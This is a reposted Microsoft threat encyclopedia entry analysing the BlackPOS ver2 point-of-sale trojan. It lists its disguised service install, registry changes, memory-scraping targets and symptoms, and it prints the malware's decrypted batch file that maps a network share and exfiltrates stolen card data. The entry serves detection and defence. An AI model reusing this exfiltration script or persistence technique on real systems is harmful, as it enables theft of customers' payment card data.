Home / malwarePDF  

Trojan:Win32/Ploscato.C


First posted on 03 October 2014.
Source: Microsoft

Aliases :

There are no other names known for Trojan:Win32/Ploscato.C.

Explanation :

Threat behavior

Trojan:Win32/Ploscato.C is a trojan that collects point-of-sale (POS) information from the infected machine. The particular variant might have been involved in the Home Depot point of sale breach in 2014, and is also known as €œBlackPOS ver2€.

Installation

Trojan:Win32/Ploscato.C is a command line tool. When run it prints the following help message on the POS machine:

  • €œUsage: -[start|stop|install|uninstall]€


Installation is initiated through the €œ-install€ command line argument. It installs itself as a service by adding the service €œmcfmisvc€ with the display name €œMcAfee Framework Management Instrumentation€. This service sets itself to run the command-line tool with the argument €œ-service€ to act as the service component.

After adding this service, it modifies the €œLanmanWorkstation€ service to depend on this newly added service. It does this by running the following command:

  • €œ%system32\sc.exe config LanmanWorkstation depend= mcfmisvc€


Following these operations you should see the following changed registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnService: 'mcfmisvc'
  • H KLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnGroup: 00
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Type: 0x00000010
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Start: 0x00000002
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ErrorControl: 0x00000001
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ImagePath: "\.exe -service"
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\DisplayName: "McAfee Framework Management Instrumentation"
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ObjectName: "LocalSystem"
  • HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Description: "Provides systems management information to and from McAfee Framework Objects"


Payload

Steals credit and bank card data

We have seen this threat's payload named €œFrameworkServiceLog.exe€.

The tool takes command-line arguments for the following actions:

  • €œ-start€: Starts the service.
  • €œ-stop€: Stops the service.
  • €œ-install€: Installs the service.
  • €œ-uninstall€: Deletes the service.
  • €œ-service€: Entry point for the service.


When run with the €œ-service€ command-line argument as a service, the malware begins.

It periodically loops through examining all the running processing. It scans all processes for credit and bank card information, except the following:

  • Chrome.exe
  • Conhost.exe
  • Csrss.exe
  • Ctfmon.exe
  • Explorer.exe
  • Firefox.exe
  • Lsass.exe
  • Mdm.exe
  • Regsrvc.exe
  • Sched.exe
  • Services.exe
  • Smss.exe
  • Spoolsv.exe
  • Svchost.exe
  • System
  • Taskmgr.exe
  • Wininit.exe
  • Winlogon.exe
  • Wmiprvse.exe


For all other processes it builds a memory map of the process and begins scanning the memory contents for memory patterns that match credit card information. If it finds memory that matches this pattern, it then writes the stolen financial data to the file €œMcTrayErrorLogging.dll€.

It periodically, drops and runs the following decrypted batch file as €œt.bat€ in the working directory:

  • set src=t:\temp\dotnet\NDP45-KB2737084-x86.exe
    net use t: \\10.44.2.153\d$ /user:10.44.2.153\
    if exist %src% (
    type McTrayErrorLogging.dll >> t:\temp\dotnet\NDP45-KB2737084-x86.exe
    del /F /Q McTrayErrorLogging.dll
    )
    net use t: /DEL /yes
    del /F /Q t.bat


This batch file indicates it is clearly a targeted attack since it has hardcoded local IP addresses and credentials.

The script maps a networked computer share to drive T:\ on the local machine, then runs the file €œt:\temp\dotnet\NDP45-KB2737084-x86.exe€ off this network share, providing the stolen financial data in €œMcTrayErrorLogging.dll€ as input. Finally, it cleans up the stolen financial information from the local machine and unmaps the network drive.

There are also political messages embedded in the binary referencing anti-US sentiment websites.

This malware description was produced using analysis of file SHA1 98dbaeb6d46bd09eca002e1f2b6f3e76fd3222cd.

Additional information.

There is more information about this threat in the following blogs:

  • New BlackPOS Malware Emerges in the Wild, Targets Retail Accounts
  • Home Depot hit by same malware as target




Analysis by Geoff McDonald



Symptoms

The following could indicate that you have this threat on your PC:

  • You see these entries or keys in your registry:

    HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnService: 'mcfmisvc'
    HKLM\SYSTEM\CurrentControlSet\Services\lanmanworkstation\DependOnGroup: 00
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Type: 0x00000010
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Start: 0x00000002
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ErrorControl: 0x00000001
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ImagePath: "\.exe -service"
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\DisplayName: "McAfee Framework Management Instrumentation"
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\ObjectName: "LocalSystem"
    HKLM\SYSTEM\CurrentControlSet\Services\mcfmisvc\Description: "Provides systems management information to and from McAfee Framework Objects"

Last update 03 October 2014

 

TOP